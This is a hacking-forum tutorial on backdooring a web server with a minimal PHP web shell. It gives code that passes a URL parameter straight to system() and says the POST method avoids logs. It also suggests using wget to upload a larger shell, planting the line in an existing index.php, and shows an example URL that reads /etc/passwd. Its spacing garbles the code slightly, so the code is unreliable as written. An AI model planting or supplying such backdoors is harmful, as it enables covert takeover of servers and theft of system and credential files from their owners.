Forum Thread: Creating a Minibackdoor in PHP by Mohamed Ahmed

Hello friends, today I will explain how to backdorize a web. That is how to create a file that executes commands, either in linux or windows (depends on which server is).

This is safer since it only leaves 1 log and if you do it with POST method does not leave logs. The code would look like this:

Code: PHP

---------------------------------------------------------------------------------------------------------------------------------------------------

<form method = "GET" action = "lol.php">
<input type = "text" name = "command">
<input type = "submit" value = "execute">
<? php
if ( isset ( $ _GET 'command' ) ) ;
{
$ lol = @ system ( $ _GET 'command' ) ;

echo $ lol ;
}
?>

------------------------------------------------------------------------------------------------------------------------------------------------------------

In the form we that command to run, so we have control over the server and can run any command, if you please use wget (LINUX) and upload a shell and Borras, a clear example of how it works would be this:

I will explain a little the function for which our Mini Backdoor works:
System: It is a function that allows to execute commands inside a server.

In the photo what I did was to execute the command cat / etc / passwd and as you can see I executed it successfully.

Another thing we can do is put

Code: PHP
$ lol = @ system ( $ _GET 'command' ) ;

in some example index.php file and call the variable lol by url and execute the command an example would be server.com/index.php?comando=cat+%2Fetc%2Fpasswd

and would execute what is the command.
Acknowledgments: Oggy & HD_Breaker
Hope you liked it.

greetings

Never Miss a Hacking or Security Guide

New Null Byte in your inbox, every week.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active